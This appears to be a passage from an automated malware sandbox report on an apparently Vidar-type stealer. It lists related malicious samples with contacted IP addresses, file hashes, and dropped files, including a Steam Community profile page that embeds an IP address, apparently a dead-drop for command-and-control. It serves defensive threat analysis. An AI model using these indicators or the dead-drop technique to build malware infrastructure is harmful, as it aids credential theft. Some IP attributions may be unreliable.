                                                                                                                                                                                                                  PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                  • 37.27.123.72
                                                                                                                                                                                                                  AKAMAI-ASUSVBHyEN96Pw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  BVGvbpplT8.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  613vKYuY2S.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  mgEXk8ip26.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  44EPDJT1V8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 23.222.144.153
                                                                                                                                                                                                                  loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 104.72.108.202
                                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSClient-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                  • 20.107.53.25
                                                                                                                                                                                                                  armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 40.112.151.235
                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                                  armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 20.202.12.183
                                                                                                                                                                                                                  2.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 20.78.208.111
                                                                                                                                                                                                                  loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 20.208.252.17
                                                                                                                                                                                                                  loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                  • 20.234.251.100
                                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                  • 21.152.225.5
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0enTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  tg.exeGet hashmaliciousBabadedaBrowse
                                                                                                                                                                                                                  • 185.199.109.133
                                                                                                                                                                                                                  • 20.233.83.145
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeTtok18.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\YYjRtxS70h.exe
                                                                                                                                                                                                                    File Type:CSV text
                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                    Size (bytes):1058
                                                                                                                                                                                                                    Entropy (8bit):5.356262093008712
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                                                                    MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                                                                    SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                                                                    SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                                                                    SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                                                                    Process:C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35590
                                                                                                                                                                                                                    Entropy (8bit):5.369832259539059
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJYq:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hP
                                                                                                                                                                                                                    MD5:80E06AF58685711A4D852DCFBDA48730
                                                                                                                                                                                                                    SHA1:ADB0942E39653EE68AAD1104EA5EA77D148192AE
                                                                                                                                                                                                                    SHA-256:D9EFB253E1E3419D9816EE5A14E21FE906EACFF5516252424F9F0E303174F7E3
                                                                                                                                                                                                                    SHA-512:F3012CD6CCA4E4BEF26C4E14E91478D2BB2C4A1C0A80AB46507BEBAA0E86DE773A3F22222B74F5E84364934E7EC256D886DD408FBC8EEBBBE65C713DAD20AC2F
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
                                                                                                                                                                                                                    Process:C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3254)
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):35590
                                                                                                                                                                                                                    Entropy (8bit):5.36978905129101
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:768:25pq/Ku4fmBC5ReOpqwczzQlFDaXfsW9l+X9hJYFn5OMF5CBHxaXfsW9l+X9hJY0:258/Ku4fmBC5ReOpqVaDaXfsW9l+X9hd
                                                                                                                                                                                                                    MD5:FA34047C6889CD0E70A09771C8258CC9
                                                                                                                                                                                                                    SHA1:2AB401DF7083BD3861669A3251D096594D6DB209
                                                                                                                                                                                                                    SHA-256:8A934547BFF6691C0B043FA8BBFF5874240602690C759D9BE8D8B2DDB4C9C06D
                                                                                                                                                                                                                    SHA-512:5E91CD9A339B944BE4ADDD4A896C427AFC0E53BE56AC2B77633B5F0CF27466B6350AE8DD4DEC7219115A29D9AF89E2CA68D38345B5F86D4BB224C7638959E670
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html class=" responsive" lang="en">.<head>..<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">....<meta name="viewport" content="width=device-width,initial-scale=1">...<meta name="theme-color" content="#171a21">...<title>Steam Community :: p1up1 https://37.27.43.98|</title>..<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">.......<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css">.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LX
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:@...e...........................................................
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
